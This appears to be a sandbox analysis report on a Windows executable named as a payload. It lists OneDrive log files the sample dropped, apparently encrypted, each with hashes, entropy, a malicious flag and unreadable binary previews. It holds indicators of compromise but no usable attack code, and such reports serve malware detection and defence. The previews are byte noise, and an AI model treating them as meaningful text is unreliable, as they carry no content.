                                                                                                                                                                      Preview:1.0./[]...+.}....b]Q.R9.(.....Rd.^.....D...(.7.d.U.....Ww'.......(d.J....~....m.s*a57.U.W..>.D.:......m...V0LX...^.H..S...a......K.....3^.01.]9.. .,.'....y.`u...~........O.kLz[6....@....`\..8.t.A.|\.^.:........6.`*.. k.,.~.L.$M.v-sm.,Mv.p.+..%.*......=.U...|.R.......,.yW%.s;....[.l......j...<.../4...!...K....D3.#*.7<-..%h....0.0...m:0S{Ff).~.?..)!w..R0;..@.|......(.=2.f......2.L.r.M.f/g..g7.......E.}?.....%e9.bn2`7...o_N.0..1......7q]..i.]p....q....Ah.p|..Yv.v./.....6./......GYR....Ws,..../._Dr.r...a.E.{./e>......a.?........y+Lw].$./(.AK.I.'....):........4K...Z....f....X.>..=.2.t...rDc.^...v.N,....qJ.#.....!....2.......^.....z.....*D......1.]^..qu.x.@../..}..pP..M..+.....<.]0...}...G*.Z..f....<m.../..~.v..*.b......EX...Me.^.<*.5?......~..\<u..^ty.Y.2.`Y.iZ.J..*..Okq)...N*.4'}...o......+..J.].BVV...{z/.w...WUF&....U).yWPi..-.d.&.....4(7.......hJ6..sy....u].\......-..md0........_.+..p}O......Kb....LK.....e#..3@Wv..g..e,"".*....i....g3.!..P

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-04_093243_16a0-1d8c.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                      Entropy (8bit):6.649107752716907
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:bovwCQTDo/QLC+79/zgm/8iGx6PaOXRCu:AMD8h+79/zgmUi/wu
                                                                                                                                                                      MD5:5830BA5743F01D56E83F879593B0DA11
                                                                                                                                                                      SHA1:C787D96DF3861228045485F54740386BD39B2E82
                                                                                                                                                                      SHA-256:BF2FF87F08109E6DC1BDED3465C6FFCA2B7A565BBD383762FB7A44B220F802FC
                                                                                                                                                                      SHA-512:FE6D4E9325E8B8AC5A18224432B2FADFC777D0015A2BB8EB05EB54A00D98C44BD6C224C2C564569E9A2D2957CEBCC8D581CA4D533A02BC8ACC3B08BB9F3038A4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./.m0......f..8..9..x....0.$...E..`V.V..@.D....8.lV.6...C......u.a......s........"....R..q......U........'.3.......?l..n...ou6.:Z..x.W=<W.......^..:H.@/.7...h..%...........3.b{{....}........./P29.|N.....<...9.a._...Q.,..a......mg..9....3.";?...g...V.....ID.U..OC.Mb.Cc...8$.y...)..%@4..{...=._+..Av.0.N...).,CR.v7$.t.'....E..K...H....v.Z.Eh.......+6...X..'...9.....).;.R..*6..0.h:...\9..<d....:...H.i.P.&q...d..8=.n.cK./`@....a#......E@......5...3v<a(..L._LJ.<.......21sJ.v.._...0.tG..A.A...h..P.3....$-c.`f...#[..H.....v ...>.........u....z.[I.kyk.\.&.m.W...B.z..N..a...m....E....<]{..d.t..3]O.qw.} c2$..8.....y.._..1..:.B.sO...r6b...ll.z'X4cnS.<...I..XJPQ.4...nN.>b....&O...TA..CK..(.M....]c`..EVE.F.;..5.0....f...?....N..:* N..N..bD.J8.o..+...K.q.s..#|.\H..+..c...).:"K.[..g..._.v..rX.r. ]...Y....Y...b.NC......-d......%k@..l..j.Na.}..j. ..1....e......H.s....c..|J.%qG...;....R..t..sz.A)....wOh].....h.m...0...oX_.ul..?.!...RHo....)q.*...W%n...i.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):30630
                                                                                                                                                                      Entropy (8bit):7.993219236614161
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:oG8s6kDSsWLmywgT1nzxkfgoixQjtRXH+N2QEyTqViJV2DzCOeBXF8VfkDAkR9se:oGgkef6gT1aItmudEm4DberYs3RFe3+
                                                                                                                                                                      MD5:476D52C78A1D0A32DD095872370A17E5
                                                                                                                                                                      SHA1:3C15168EDD7358152E081A417C3BCB949B65F1B4
                                                                                                                                                                      SHA-256:073E105B87D04A512F294D844EB6E095B109DD16051F29C5BEE8EB36C728D352
                                                                                                                                                                      SHA-512:91398790536CDB55FE9735C0820C5D6A17AE84E7CCA2238D546CE34151DC91681E813A35982F0CC374469BC3912F8A3B0508EA0B71191382CF09FDEFF0055C6D
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:1.0./.O.j......3..*...N.'..;<..r.P.F......x.T..F........%.K.6.<N;....*.....F.....|..... w.....H....vA?KK..........."10.T...........%.......%...C.s...M.I.>.].N..?c.V...zi...~E...j#..o.E...k.:N....j.>N...K%....v..._.r.........4.....6.^m.............U...)<Q^nski...aOM.....1{......S...9.Gy.qw.@.oA..f.R.j...B....z=W...%$W.@...C..U....|...dx..o.\.x.0..m.....5.......;O:........tnIB.....i.......l%g..]i...E.......c=..s-4w...\...........w.d$.t......r#...j#52...hE/..(..l.%vJ.A.{.".Lf.^.k./.u.,.......g.wO.....O..X.......p.q.]...Y.8.%V....{...I ..R...N&0j..?.3..h.&jo..q.....w[.V...:.)<q........NO$.w.Z..4.`Pi.....q..q..5..!=..f........cX.{.?...H...d.>{...q.\.0..5M..5.D..0*Z....m..&....<V.h|....o.Y...d.o...mF.....W.A.PGGGVr@..5..9an>...x.6C.o.c..c.\t.k..!.n..'......V.-bS~6.R.|c...>.%....W....=...."8./a...E.p8.P..t.2....F.\..>b......c..........:lK.nn.|.p.i.H..H...N.....un.a[6...c.N..N.g..'lw4E^.X..V. ~ }/....W...a~..`..E..i$.$..../l..m...`l{T.Y.Z..k.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_115005_4240-5892.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):4.499824719881105
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:qD7OgyXrHGTdp9aT/novm+XB3dFD1WHBCEHjgmLF93BlF:kHErHGTYLov3/1WhCSMmLplF
                                                                                                                                                                      MD5:5A91D84A95B4527A7BED7AD5A7BF2902
                                                                                                                                                                      SHA1:0A5BE3B82147178EA90DB4A7AD641453A924021D
                                                                                                                                                                      SHA-256:3ABF78926DD84B5897D86C3F93F8A136280203D9143263813287A87F77EFD9B8
                                                                                                                                                                      SHA-512:E5D86EBC313C1D2353BA3C82F239201FE43F2EA94380BA1BC89F783E49C736C4B70EF98E0384C3A8A82A0612C535C45A90AF82AB2AB39FD784FFCA2F2F123702
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./..R...J.p.O...}U.........y.OZh...0...S_.....R....t..fFL.!.;}.X..bT{p9....O.*K..XB....G#.l.IfY.T4.#\.E....p.GFDf.....Hev..!..E*.>......-.7,............A..}@.>.....nEzW...X...hG}....O.5...KX.2..2...T.#.W.c.+.:.8......C..<.....:f..(.'.a..r..4..yE...J..B..p...}.p.....Vj2w....?.X..&C....R .{.h...a...A...y.4.1...(R.|).Ug"*......gA4.T@.U...B=.........M........n.....h.._.`...f,7G1.....D3......Q./W_t....].t|.......#...{.>.2.*..8R..A......;.i..me[..6c....'...........l^X.O^.....m.%.......N1.n.8.Sv.O.....i....0|...}q... ..bD.L..... .Aj...........@.UQ....ty]...fk. ...i.J...|......{....j..k.?..M.oR.".-.;....5......I......p`.....V.=......\... ..q#(F....8H.W.cN.....)."...1q..C4H.N..k.&.d=x(...z.....$.....P.....\.X.A..n..3..P..MR..?D..A.....G...q.G.O@P.cc....".K..i.8...p.ba.+...,k.)..X.....|...(...6..,...H>..$55w.%.i........P?.s...B"2..Zg...wvs..!............<..{,.[..{.C. .... ....i.6......|..z...tQ.zp....On..B.q.....o.C....b.{....i..cC

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-04_093243_14f4-1074.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                      Entropy (8bit):6.629723131768915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:O0CSrY3JXitBf+spTs1Q3+tk0yLbkwZTtDsP:O0CA3tftuQ38k0yEwZZY
                                                                                                                                                                      MD5:5DFF752AF79B71346DAEE939CCA7F447
                                                                                                                                                                      SHA1:6D0EC49DC8F52C22099F5818BB56EC4DE3BE30E6
                                                                                                                                                                      SHA-256:FBC108C681B154A3D72F7CF4887CCC939BD8505D1C22CBF7B8108A9C6266E470
                                                                                                                                                                      SHA-512:9B7E43E79C91BB822B57F0E5CFE88681203F6F530220C7F088A34898A8705746380A853EFFDBB1723596714312952AB6AB1EF1B204C1898323890BF28C3FD649
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./...:c...').<.W..CO...o....s..p.qj......Z.........,Ivs..$M........|.x(.`..v@....k;..s...'.....A..U1.:\...mR^pA],.. C\.c. .wbGp<z,a,Ka.6...ZJ.]..G.Q.<7-#.b.$@...v&q..u....x.R.Y....X6.r7#s.....A..m.w..q....v+z.GS.l.....X.....x...F...I..j;.....)U..N>..<.....n.,u.>..6..d...~.Z.]...I..8.CU.^..EeqlC2...y.n.......b..x....x.p>A.Zd.0Z..R.x...D..U\.gt.....K/.3.Z...j....kM.h.J[..v.A .{nm....[.%k,y"..J.C.on[.?Q.U.......#...?E....Z..>....a...H~.+...Q}.P4..aR:.I..J"U...z.C...h..9.f.x.. b...lq+.BB....Z{.....Y.G.,.....i.Kk;@..'!or.-..........G...Y....J...W.!......;MD.....i..4./.t.j.../@q.k....._t...]Z..._6.....J2U.5..;$<.....].(........V`....n@..Y.:C.LW................O.K.uk2...p$....M....z.L1..:(.k...AX5..:...GP...._.f.......zB2..!y...Y.J.2K.4../O0..3.....p......c......p.G...=...q).S.hlHq....m=."m...e.......h.....}./.l1....S.X...[.w..7:.MN....]....&ML`d.]G9.0S...L`...j[0`................z...Y..t..$5..'e4.O.X..Zu..Q.0..9...z..2.BT.....0t%%{L..WUG..@..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\StandaloneUpdate_2023-10-04_084137_4224-6092.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):2.101531103428338
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:zXa9L+6GkauJIUl2XeUceocVuJL81JE77EgCaHXHcPB/q5OeE0Uk9/RnkNseVucp:bawUJI02Xbw9AbOKS0eXUk9/tkMcBv
                                                                                                                                                                      MD5:7283330C5436A17AC42C15007510080D
                                                                                                                                                                      SHA1:590C7CEF54FD49331277C68A0A9E463731A8EF32
                                                                                                                                                                      SHA-256:509F6F39859DA83C1866753D4735288F0FDAD08097D4CD3842EC01FE4994DD0C
                                                                                                                                                                      SHA-512:F4A77F4A2F5BA01206A3875EBF85F961A374A93C111B1BCF0BE7F9E01CA253116167957643E5F3BD62C61C8E78D5E7FF6A1D8660DAD729F4BD91D2910E56428A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./.g.Ws.| .$....eF."[.gj.".dJ@T}c...vR........<\.>yD....... !".J.5.<._.b..L.x...S...w.&1k....s)..2.j.~I..Ea..gk4.v....We+.F.S.y.[]...#&.<.+Nk..m.u.M......-.]F.^..B.s..u.q9...}.F.m8=.4NgN...P7....c.PZ.$.Q..........ns"Y..n&.p.....x....... ..GR.o../..].../C...C............Y.{.8<iE..F..v,.q6...m.{~Cm`.].w/*....Y.\..|op-. v:........#*....]....2...w.bfP...........#..oY..yC..(...8........X..b..t.!..K..K..}..s..m..V...|pH..q...z$.H..$..Y.(..0/...V.......f..bl.LO.r.o.!S.....Zs.(.%..+.M...S#.e.s...$^..V.c..\.S.b..I.F6.T........Y......e.../.....Y.|.>..0.{.).a.M.5>.i......w.;..h..n5....SR..hk.....U.."....:.u.G."+Co...tI;....|h.....;.:..[...J......2...tOM...6...............V.&...2f6O.O..G..;..%..D...m...X....-.........X..h.uh3....|.....p.'.g....T.s:..f#M....;....&...$3..F.LM.oY:y'..>.q.`....,....5a.........@..rx..5..g)...b.~..h...x.M...`.b.e.k....k1i...1.F.W.M..P.-..^1i......,.L.'..wQe....d..`.&o^...#?.r...G..]j...|...f`.......R4....K.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-04.1059.6292.1.aodl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.9653875409061919
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:DExAQySD8I6apVZIVq3ZHMLRKyjVmUfhgxjAm4Dy6ZNPKdIY95SBuDCT+qGFV:DsCaHZDNs1mUfi9FfCKO8Ss2T+qG
                                                                                                                                                                      MD5:8246177B0C3A23A34CB51FBC86A64C1B
                                                                                                                                                                      SHA1:6442F98EF3A998B4DA8608D8C3BA18B2387B556F
                                                                                                                                                                      SHA-256:D0835FF4A9945B0C5517D925ED8B5CBB6A17FB80CC0A0F4E14F4EE876250090E
                                                                                                                                                                      SHA-512:E0C3CEC0183F66AEE36344875B4EB92F550328410047B17321FB5235EE741704B8B15CD8036C72D66F7778B4B95DE2F86ECF18B1817633EAD7337D6799E36BF2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO%..._nh....yY-....p....l..j....y.......'.S`@..c....[.r.'p.8%.\p.._Xx.E..3.......4...Z..#8.y...w......c.._.p].ql.....o.!....d3#c...Q....B.t..~2..5FuL..sm..@.....A.......AU..Zd:...?.$.<ae......'.].,..%+.u....F..t......b....=..7[....L...G..w.F(.h.....m....?..g.Y'"t.._..PN`0.....\.=..e..._...93..u;P......!.(.+&.E.5.4.t...]...}.....7.T!...;+..5.q.Z..z~.t.o.....@ ...oF.....!'."......YJQwf....V.,b...~t..5.....a..4G.9.x..2.;.V.+.V..h]...p!Al...0...._...../?u.....d.2..|r1m......M/....0.u.k.G...;...iv..?;.9..Q7#.er..h........_...\....d./......p...|*^2.t.....D9|/..."=..g=."..i....(~i>.G.j~N.&2.Ji<u..c.1.!j68....h.'.)p......;.i........a?..#.a.....&...e..1.....&..g/....k..pV.g.........../|j..j..Pf..I..vaYIh.rI.>.}....Gw..E1.....a..v#.ym....R....(.@.f... >JN.d..S.&.].....u.D.D....."0.0.....o..+.Zq..T.g..Z....{l,.X-..:P..#...M......N.......s.....3<....(...:.=m..S.0.(.....i.p@.... wC5....;W3..6e......4..t@z.~W....^...[..57&3......,..._aW%.8..}.K.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-04.1059.6292.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.55990656160305
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:AWqn81fzfdbVApmbR+MVKthg8mtGBTu+3BTw/Xt6CQy8X4uH:d9zdbVApmbRl8thhmtGB3B8/C
                                                                                                                                                                      MD5:4DCCEFEEBEC91C041394C7E4983DD3FA
                                                                                                                                                                      SHA1:A4498DECC52AB366C5FB79DD6F55A9234ADA0189
                                                                                                                                                                      SHA-256:E947963014625966219FFE8ED1877930322B57B8F9DC5053C538CD5D3841978F
                                                                                                                                                                      SHA-512:EF1B1CBD56F63737153A208489DEDEF760C218CCCEE8F2CCD23F1AB3678E58ED8FA03256E0D95F3ABB5D3C623A2DF8559C01BCB0E315DD578941FC2C7777A60B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO+...n.....Zh..q............G.\9^...j|.$..(.*.].@.oa..A..........@G..z....I..>].2.....zL([]=P.......c....UO.vK..+.N\.+w....q....U30.i.NYz..(.8.A..X|..U.^.Z`.\]3Y..."+.-?VU......P..\}...U .+.....%#...........$...%..[B...EEVL..|.Gp...s>3.K..t%..,.........0i...m.+...........A........./s.......()...F.Z...`.......L...w..*q.m.\...v..w....eW..]3..#.{{{~.xiO.....]k.S...V.FM.d.:.C~v0.h!d..ul..]...J=.....F..$....{.e.U.....-..D.B.L.{.(..'.j..h.m......)...8.QJ.z.;i....X ..^._.7.o.8.:.."..!\......<'........BG>g...O..$3........'|....Z..8J.R..(.J..j..a....D..2....6..Q.FA./Ml.]....YH.V.d.(q..+.w...}...;..b.....T.....U.hj..*.8c.h.@....<.=Y`.i....a..._.....&0B....a.....>:.X.S.._.\..h..1.[.....w...{.^VN..(.}..A.....y;.Q .&...).Q.n...)..9....A...?.bB....{.#B...U..}..^.JPW...px.S.....r. .J.M.c..! .5).1.2}.g.%..ny...Ks.>k.._..."..b.0.\eX2D.Q.[^{...Stq.z.Q.>$..a.8.Fdo./..E.'..@\(.............eL...1..Gh.....(dG.....7u....)...j!_...R...|....XT....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine-2023-10-04.1059.3196.1.aodl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.8650297225055076
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:CYhuCGIBAGh3fWBy2saojVHl8cwYEQuWbLi2WVBWjKS+PR2sKx6:fuCGsAGeIBjNl9ZvWVB2j+PR2s
                                                                                                                                                                      MD5:F8D6BA89CDF99966D54EA6D78F2E8D4E
                                                                                                                                                                      SHA1:9EB6428F360496EE269C9406AAE2B6C7B455023A
                                                                                                                                                                      SHA-256:748283DBD1FA4EE50C6002F6EA86BEA8091FCEFAA851F135493A87F986A42E9B
                                                                                                                                                                      SHA-512:7377FDC70B4F51CE9695B180BF2CF3C625F831787166905520EE16A3C4471858D178B156D71FCB3B10DA30F4ED8903D31A2DCE54CA18958526335AFDED1EA768
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGOHE..x.EA.xL...:...&....z....#i.,d6.i^....}{..X3.T-.F.H$.oxL....% d.....(0..q.N).-..D...c...r.j... .~.sb..r8.^t...K.!.l.X....#[.c.[Sr....mkM........`Z?4......rgHJ.[..M>y.a......[&.@}xP..4..".Q.Y.......hT.......nS\..S.....~#...I........aGq.Z.3.I..9.@..[.2MFk.F.v...x.S....{n.:<...p....A.(.5......2...x..l.._. Zb@.S R......Z.......H.A..?.H..t....Q)..2....@...jqG.v.....a....\.;f..@...h.K..k..*s....6.$...!.......$/..]-...a<DP...`....^...Tj..a._d.*...G...T..P..'..S.....&7.Shh........F.....9....yL.......6U..(..(...bd...g._0.r....Y2Z.......E.8@5.j.Nr.#.+.V...:..S]. p.T..g..8...K(.$|9...ou..gb.C...1.U^k.....U..'..&..t5.w...m.n2.-S..p........m.....|..gy.a...R....E...cG....*Y.l..Iv......$...j..Tu./.y.....$.k.....$....QK..6.C..yTP...._(..'..x.&..p........sC....[9.f.^B.I...D..V{.?...u...$GU.(..j...2..S...g.M.....x...g...U......P.w.p..H.<G.....L...c.C...j...CX./....Lw1g....\9;g...............0..v....["3...).zW......>. Ad...&.H.O..&......4B.>&.d

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine-2023-10-04.1059.3196.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.20604184917999535
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:cxJUhGAiBqb2LFLuNW5SZGI2RzE5biL3/L3YavrPMYxQgaHnAkR4q0TZrKAnh1+R:cWV5mqWSMzGW7T3Vvg5gaGVZrrjt2bz
                                                                                                                                                                      MD5:CE77C0FB1B793757326FAAC0706FDFCD
                                                                                                                                                                      SHA1:0FD2DF819D02119AC4C2A9BCF6909970369565BF
                                                                                                                                                                      SHA-256:EF518731A8CCD2A1CC86EF4717965E9735A739D37E69069D2B16A86E15D694CD
                                                                                                                                                                      SHA-512:715F0178CA25697631910B0907FB1ED4E9EE7DC3A3367347BAEE169B3C5C7F97CC597DC7C515B197A2B178DF394A8EB480AA7C784A3C644F59D44300A8CFDBBA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO.Q.....y..s.}....nlr.w")...S%p^.X2..k..s....$c..B....k.....b...v4i..7..q.|.G.....J....$....h..T.......Wq.;..u..3L/..1B.6.yJ;.NdM.p8...hGHV.P.HK@Rz.T.F]..aR...oM.......)T.Oa.D.b...L3.nu.A<...#cK?..g./m....x..a.lo..`...(&..);%NW&.;PI7./....T;^4.c..............k..|y.D$......!.=....".f..-.A|G.fQ...V...HB%.......;..G!.F............._K.I8....\.v....Lj..X.`WtN....8.}....O|..QzbHc._d..`b....Z...c..kX.<..a.....6..?0I..P............FV.&.2N\....-.7@..ih..V..h#i..)(.4.Z...."..=GS\.={P"..k.;F7.3V.....\...UQm..B&...[.?.N3E#/..ak{.V:-.z........>.....s_...'.6......9.........,h.;.N....6f....P....O3b8.u^R.....L2..cM..|..9.....M./..].,.:P...7.....u[........./..`{../...&jb.Oh.>....~KbJ.+...~..lD.ki@.J..p!..]..V..Z...t+..BM...b..1.*..<.....Y>n;..>.....X.U....5.ae.R.of..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2023-10-04_105957_c7c-3d4.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):3.4563865772459788
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:2jL7entbAOIYZAv1tG070zLhiN5Iyk7tESV:a+bMYZh0ozU0nV
                                                                                                                                                                      MD5:9352D3A39B0EA561E766618698A87E83
                                                                                                                                                                      SHA1:1DD1A233DCEDDF3D9B56E15D92C8284FEB3864F1
                                                                                                                                                                      SHA-256:06A49ADE7C2F253DE79BF108E6AE3EF849142EA2AF7E553F0AFEC479FA334969
                                                                                                                                                                      SHA-512:AB1C8914D22BE069A58DCC4442814A1E12D3C4350A7923D1699BA55BC02130C4EF7923C8594C9D78D5C9599282A30D578A244C4C68D7E660E07A968DD786BC33
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:1.0./<......5q..q}d/t..W.....j.L{..[.{.5..W.......d..H...6I..|......m8.R...n.|....y.(.O.R..*.z.wk..@..W...;}..!.3...WK.dX..?..5...o..hr...X...,....H(n.........E..Zh..k..o.........o.u.>`d@..+.o.d...j..CK...(.G.%...2{P...{.0A...6.5....A...mw.....l.0M-....v9R.Bj....tF.~....!<s.$..)...........s....,..R..d7.m.............U.'....7nj..p]S. 7..m-..b.(..2.<.......~...Y..Ht.M.q..I?.>Y........r..(....N.B........'..s.-.C....RRP+.q-..b9..*...u..sR5.|..q.'....;u....m..n|w._Y.E..)X..../...{..k}D...Jq.hgZ['^2Q[.-%%..4.h@..8.77...0.sK.....5]..%c..Y...B..........C..0.Jh.....{{.Io|'}...!M#..g:.Z.-....=..z6.....Q..p...=...&aK..*..y.s.(pS.q....)...H...{.k..-L.....`.Z........P.x.J...........VN.....=.a(.4]......5.........tU=0..N. .w}Ck(3.J=.. .fN&........).g......"c..x}.[.....E...w..l.q.v.o....J..P.a..t.2K../wR..h...k. 2.p... ../.......13.M..,...\E}.14...d....Z....{...'........r..]...2@.%.n.^..-...Z.ygI...R...:...M..K$n.9.....t..k....R.]...G.*.....9K..V(H

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser-2023-10-04.1059.6636.1.aodl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.9424322067446913
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:eRwnX+U8ioyE3jyr/spVUK1bgYMp57jx0Dn6RYD:eRwnOUTA+r/2CYC5XaD6R
                                                                                                                                                                      MD5:DD7B001735484C2766800F85E059E68F
                                                                                                                                                                      SHA1:6DB4EE99137718F81EA45E1C222FC4A59D563F0E
                                                                                                                                                                      SHA-256:9240BEF00767D4B9BD2F4139DA78FD5CB96BB6F04B4D8767BC64C1260A653B3F
                                                                                                                                                                      SHA-512:EF4DDB0D1D98D6503FDB487EFA02A43571D751C42F0763DDFCFC07B167481C620CB56EE073F55C99583436B6F8869244DEDE4ECAEDDEDA3D70A27D728A7AC93D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:EBFGO.....S....;.|..>!..\.._zb...T.X..........l..mBOy.R....m.&.~/...Z.a7<..:.....n...V[.....:$N}..l...T......J.;.<.a.qCe.K.....TG.&........3.....b....%Db.!}[..+z=........u.ms........e.s...<>..b.o.......6..(>.8.....J...n>.9...G?...d..g.?..b%...R....].8|.>.j..K1.....n..h6..B..A...R.`...Ap.z.. ......|...],4.'.M......!.B....4P......zo....$yW.U(./..b.97..\.g"..dG....%.gX....Hn....P.H.4...-..}g..z-Pw.9G.E..7.6x.7.C.....|.....\t0...0.P[..7.....N......uu..e... @-.2...<...}...3o.!..o..C.hH..Ik..:...}t?......=...L.;...P..~q.W.Cm.....j.'..-.0S.z..1..1[.i.ms....;.....!`........;.[V..4..H.".e.....Y...F)..\.Ur....+.....mS.;+.RW:l..7.%....N......]..dm.!-.d..-q0x..y......h...I.2I\.}.p........b...[......o..Kj...CMw.I7.....g.r.JXD.gX^......].-..A&.K..... ....d..I.:....i..3/....RT.....&.I]./...{.}.../_.wl.&.x6.........*eJ.y.....d....o..,.#..^si..N.O.$<......MT..K.....S)....0.....d&...r..-..Y..dS.y.u.F..Hd..k.A.W.)o.D.P.sj.~.a.?!..f|r..NW...=:.x'z.~o......RE1...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser-2023-10-04.1059.6636.1.odl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):0.20604259214419804
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:nuGYz7zF/sVtPyUHyjIKy+77wu3AFRAV2bz:nuZ/xUV2jfy+wuQF/z
                                                                                                                                                                      MD5:1283996DC438F37A7AF40CFFB691F1AE
                                                                                                                                                                      SHA1:588FA5F6339F1E3BB49F7FDF6946840F2D89BA35
                                                                                                                                                                      SHA-256:614965D4C64BB61B55B2F30265EAD3A11E919F29203A5593298521B40EB30275
                                                                                                                                                                      SHA-512:4AA6A35D13BBDC3B021B48062ADF9BBEBC321C35245976DF90D0C6D659AB1BDBD2CB50941799F32ABE16B5A9DC8D0A7B7822C1AB656EDAC1F117F1411442320E
                                                                                                                                                                      Malicious:false
